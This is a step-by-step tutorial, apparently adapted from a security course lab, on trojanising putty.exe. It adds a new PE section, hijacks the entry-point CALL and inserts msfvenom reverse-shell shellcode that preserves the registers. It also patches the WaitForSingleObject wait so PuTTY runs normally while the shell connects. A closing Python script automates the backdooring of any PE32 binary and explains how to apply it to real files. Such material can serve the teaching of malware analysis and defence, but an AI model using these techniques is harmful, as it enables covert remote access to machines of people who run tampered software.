To modify a Windows EXE file and save an altered version containing Trojan code in a new PE section without breaking the program.
Caution
Because of ASLR the image is loaded at a different base each time you start Immunity Debugger, so the upper part of every address (e.g. the 014A in 014A1234) changes from session to session. Adjust the addresses quoted in this post to match what your own session shows.
Tools: putty.exe and LordPE
putty.exe: https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe
LordPE: https://samsclass.info/127/proj/lordpe.zip
Duplicate putty.exe and rename the copy putty-mod1.exe.
Use LordPE to add a new section to putty-mod1.exe. For details, refer to task 1 in https://samsclass.info/127/proj/p8bim.htm. Make sure the new section is flagged executable; otherwise the program will fault as soon as the entry point is redirected into it. Note the ROffset (raw file offset) of the new section: in this walkthrough it is BA000.
In Immunity, open putty-mod1.exe.
Use Immunity Debugger to examine the NewSec section: go to View > Memory.
This shows the memory layout of putty. As outlined in blue in the image below, the NewSec section begins at address 0x014A3000.
Right-click the section and choose Dump in CPU as shown below.
You are taken back to the CPU window. Note that the program entry point is 0x01477FD6 and that the instruction there is CALL putty-mo.01478265.
Double-click CALL putty-mo.01478265 and change it to CALL 014A3000 (the starting address of the new section). This is the only instruction in the original code that we overwrite, which is why it must be re-executed from the new section later.
Right-click 01477FD6 again and go to Copy to executable > All modifications.
A new window pops up; right-click in it and click Save file.
Save the file as putty-mod2.exe.
You need to insert the following assembly in the new section, in this order:

| Assembly code | Purpose |
|---|---|
| PUSHAD (60), PUSHFD (9C) | Save all general-purpose registers and EFLAGS on the stack before the shellcode runs |
| Shellcode generated by msfvenom | The payload |
| Stack re-alignment (e.g. ADD ESP,200) | The shellcode leaves ESP lower than it found it; restore ESP so that POPFD and POPAD read back the saved values. 0x200 is the difference measured for this payload, yours may differ |
| POPFD, POPAD | Restore EFLAGS and the registers to their pre-shellcode state (reverse order of the pushes) |
| CALL putty-mo.01478265 (the original instruction being replaced) | Execute the displaced instruction |
| JMP 01477FDB | Return to the instruction following the replaced CALL, restoring the original program flow |
PUSHAD, PUSHFD and shellcode
Generate your favourite shellcode using msfvenom. If you generate reverse shell shellcode, set up a handler on your "attacker" machine.
Go to file offset BA000 (the ROffset of the new section) via View > Goto.
Overwrite the bytes starting at offset BA000 with 60 9C (PUSHAD, PUSHFD) followed immediately by your shellcode bytes.
Save the file as putty-mod3.exe.
Back in Immunity Debugger, open putty-mod3.exe.
Reminder
If you generated reverse shell shellcode, set up the handler on your "attacker" machine before running putty-mod3.exe.
This next part can be tricky. Step through the newly introduced code with F7 (step into), stop right after the PUSHFD, and note the value of ESP at that point (e.g. 0029FD74); as always, save it for later.
Remember that PUSHAD pushes the eight general-purpose registers and PUSHFD pushes the EFLAGS value onto the stack, so the value of ESP after PUSHFD marks where those saved values live.
Scroll down to the end of the shellcode (or use the search function to find its last few bytes).
Toggle a breakpoint on the instruction just after the shellcode. Choose Yes when the Suspicious breakpoint popup appears.
Continue program execution and hit the breakpoint. Connect to and then disconnect the reverse shell so that the shellcode runs to completion.
Note that ESP is now 0029FB74, whereas before the shellcode it was 0029FD74.
We have two ESP values. We use them to restore the stack so that the saved register and flag values can be read back. First work out the difference between the two values: 0029FD74 minus 0029FB74 is 0x200.
We need to restore (re-align) ESP to its value before the shellcode. To do this, add ADD ESP, 200 immediately after the shellcode.
Double-click the instruction at address 01433146 and change it to ADD ESP, 200.
Press F7 to execute the ADD ESP, 200 and verify that ESP is back to 0029FD74.
POPFD and POPAD
We need to restore the registers and flags to their pre-shellcode state. To do this, add POPFD followed by POPAD after ADD ESP,200, as shown below.
To restore the original program flow you need to insert two more instructions in the new section: the replaced instruction (CALL putty-mo.01478265) and a jump to the instruction that follows the original CALL:
CALL putty-mo.01478265
JMP 01477FDB
You may notice that the upper part of the addresses has changed from 0147 to 0140 in the screenshot. Because of ASLR the base is different in each Immunity Debugger session, so adjust your addresses accordingly. This does not break the saved file: CALL and JMP are assembled as relative displacements, so they remain correct whatever base the image is loaded at.
Highlight the newly added code from ADD ESP,200 through JMP putty-mo.01477FDB.
Right-click the selection and go to Copy to executable > Selection.
A new window pops up; right-click in it and click Save file. Save the file as putty-mod4.exe.
Exit Immunity Debugger.
You can now test your shellcode outside the debugger. You will notice that you have to disconnect the shell before program execution continues.
This is because the msfvenom payload calls WaitForSingleObject with dwMilliseconds = -1 (INFINITE), so the payload blocks until the spawned shell exits. For WaitForSingleObject details, refer to https://msdn.microsoft.com/en-us/library/windows/desktop/ms687032(v=vs.85).aspx.
To resolve this, make dwMilliseconds 0 by replacing the DEC ESI that produces the -1 with a NOP.
In Immunity Debugger, open putty-mod4.exe. (Start a new Immunity Debugger session if you did not exit it in the previous step.)
The DEC ESI instruction appears roughly 10 to 20 instructions above ADD ESP,200. The payload contains more than one DEC ESI; the one to patch is the one immediately followed by PUSH ESI (which supplies dwMilliseconds), INC ESI, PUSH DWORD PTR [EAX] (the process handle) and the CALL EBP that resolves and calls WaitForSingleObject.
If you want help locating the WaitForSingleObject call, you may refer to https://webcache.googleusercontent.com/search?q=cache:0Td191uQAQIJ:https://simonuvarov.com/msfvenom-reverse-tcp-waitforsingleobject/+&cd=3&hl=zh-TW&ct=clnk&gl=us.
You can also step through the code to inspect the WaitForSingleObject call.
Right-click the changed instruction and go to Copy to executable > Selection.
A new window pops up; right-click in it and click Save file. Save the file as putty-mod5.exe.
Test putty-mod5.exe outside Immunity Debugger: PuTTY runs normally and the reverse shell is established without having to be disconnected first.
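The same edits can be made to the file directly, which is useful when you want to repeat the putty-mod1 to putty-mod5 procedure above on another binary or with another payload. The script below is an added example, not code from the original post or from the referenced samsclass project: it maps the new section's RVA to its file offset (LordPE's ROffset), builds the PUSHAD / PUSHFD / shellcode / ADD ESP / POPFD / POPAD / CALL / JMP stub with correctly computed rel32 displacements, redirects the entry-point CALL into the new section, and NOPs the DEC ESI that feeds INFINITE to WaitForSingleObject. It assumes a PE32 file whose entry point begins with a 5-byte CALL rel32 (as putty.exe does here), that the last section in the section table is the executable one LordPE appended, and that the stack delta (0x200 here) has already been measured in the debugger as described above. The byte sequence used to find the DEC ESI is the WaitForSingleObject call site from Metasploit's x86 block_shell.asm; it is only visible in the file for an unencoded payload, so verify it against your own msfvenom output. The sample PE is a constructed two-section skeleton, not putty.

```python
"""Offline version of the putty-mod1 to putty-mod5 steps above. Added example,
not code from the original post. Assumes a PE32 whose entry point starts with a
5-byte CALL rel32 (as putty.exe does here) and whose last section is the
executable section LordPE appended. The sample PE is constructed, not putty."""
import struct

def parse_pe(pe):
    """Return (entry_rva, sections) from a PE32 file image."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    coff = e_lfanew + 4                                  # IMAGE_FILE_HEADER
    nsec = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20                                      # IMAGE_OPTIONAL_HEADER32
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]
    sections = []
    for i in range(nsec):                                # 40-byte IMAGE_SECTION_HEADERs
        name, vsize, va, rawsize, rawoff = struct.unpack_from("<8sIIII", pe, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0"), "va": va, "vsize": vsize,
                         "rawsize": rawsize, "rawoff": rawoff})
    return entry_rva, sections

def rva_to_offset(sections, rva):
    """RVA -> file offset (the 'ROffset' LordPE shows for a section start)."""
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return s["rawoff"] + rva - s["va"]
    raise ValueError(f"RVA {rva:#x} is not backed by any section")

def rel32(insn_addr, target, insn_len=5):
    """Displacement for E8 CALL / E9 JMP: target minus the address after the
    instruction. Base-independent, so RVAs or Immunity's VAs both work."""
    return struct.pack("<i", target - (insn_addr + insn_len))

def build_stub(stub_rva, shellcode, stack_delta, call_target_rva, return_rva):
    """PUSHAD; PUSHFD; shellcode; ADD ESP,delta; POPFD; POPAD; CALL orig; JMP back."""
    stub = b"\x60\x9c" + shellcode
    stub += b"\x81\xc4" + struct.pack("<I", stack_delta)   # ADD ESP, imm32
    stub += b"\x9d\x61"                                     # POPFD; POPAD
    stub += b"\xe8" + rel32(stub_rva + len(stub), call_target_rva)
    stub += b"\xe9" + rel32(stub_rva + len(stub), return_rva)
    return stub

# Metasploit's block_shell.asm passes INFINITE to WaitForSingleObject as:
# MOV EAX,ESP; DEC ESI; PUSH ESI; INC ESI; PUSH DWORD [EAX]; PUSH 601D8708; CALL EBP
WAIT_SEQ = bytes.fromhex("8bc44e5646ff306808871d60ffd5")

def patch_wait_infinite(shellcode):
    """NOP that DEC ESI so dwMilliseconds becomes 0. Works on raw (unencoded)
    payloads only; with an encoder the bytes are not visible in the file."""
    i = shellcode.find(WAIT_SEQ)
    if i < 0:
        raise ValueError("WaitForSingleObject sequence not found; patch in the debugger")
    return shellcode[:i + 2] + b"\x90" + shellcode[i + 3:]

def backdoor(pe, shellcode, stack_delta):
    """Write the stub into the last section and point the entry-point CALL at it."""
    entry_rva, sections = parse_pe(pe)
    entry_off = rva_to_offset(sections, entry_rva)
    if pe[entry_off] != 0xE8:
        raise ValueError("entry point does not start with CALL rel32")
    orig_target = entry_rva + 5 + struct.unpack_from("<i", pe, entry_off + 1)[0]
    newsec = sections[-1]                                # the section LordPE appended
    stub = build_stub(newsec["va"], shellcode, stack_delta, orig_target, entry_rva + 5)
    if len(stub) > newsec["rawsize"]:
        raise ValueError("stub does not fit in the new section")
    out = bytearray(pe)
    out[newsec["rawoff"]:newsec["rawoff"] + len(stub)] = stub
    out[entry_off:entry_off + 5] = b"\xe8" + rel32(entry_rva, newsec["va"])
    return bytes(out)

def make_toy_pe(entry_call_disp):
    """Constructed PE32 skeleton: .text at RVA 0x1000 (entry = CALL rel32) and
    NewSec at RVA 0x3000 / file offset 0x800 flagged CODE|EXECUTE|READ."""
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)              # AddressOfEntryPoint
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, len(opt), 0x102)
    def sec(name, va, size, rawoff):
        return struct.pack("<8sIIIIIIHHI", name, size, va, size, rawoff, 0, 0, 0, 0, 0x60000020)
    hdr = bytearray(0x400)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)              # e_lfanew
    body = (b"PE\0\0" + coff + bytes(opt) + sec(b".text", 0x1000, 0x400, 0x400)
            + sec(b"NewSec", 0x3000, 0x800, 0x800))
    hdr[0x40:0x40 + len(body)] = body
    text = bytearray(0x400)
    text[:5] = b"\xe8" + struct.pack("<i", entry_call_disp)  # entry: CALL +disp
    return bytes(hdr) + bytes(text) + bytes(0x800)

if __name__ == "__main__":
    # Constructed stand-in for msfvenom output: INT3 padding plus the wait sequence.
    sc = patch_wait_infinite(b"\xcc" * 8 + WAIT_SEQ)
    out = backdoor(make_toy_pe(0x28A), sc, 0x200)
    print(out[0x400:0x405].hex(), out[0x800:0x800 + 50].hex())
```

To apply it to a real target, read putty-mod1.exe (after the LordPE step) into `pe`, pass the raw msfvenom bytes and the measured stack delta to `backdoor`, and write the result out. With the addresses from this post, `rel32(0x01477FD6, 0x014A3000)` gives the 25 B0 02 00 displacement that Immunity writes when you type CALL 014A3000 at the entry point; because the displacement is relative, the same file bytes are correct at any ASLR base.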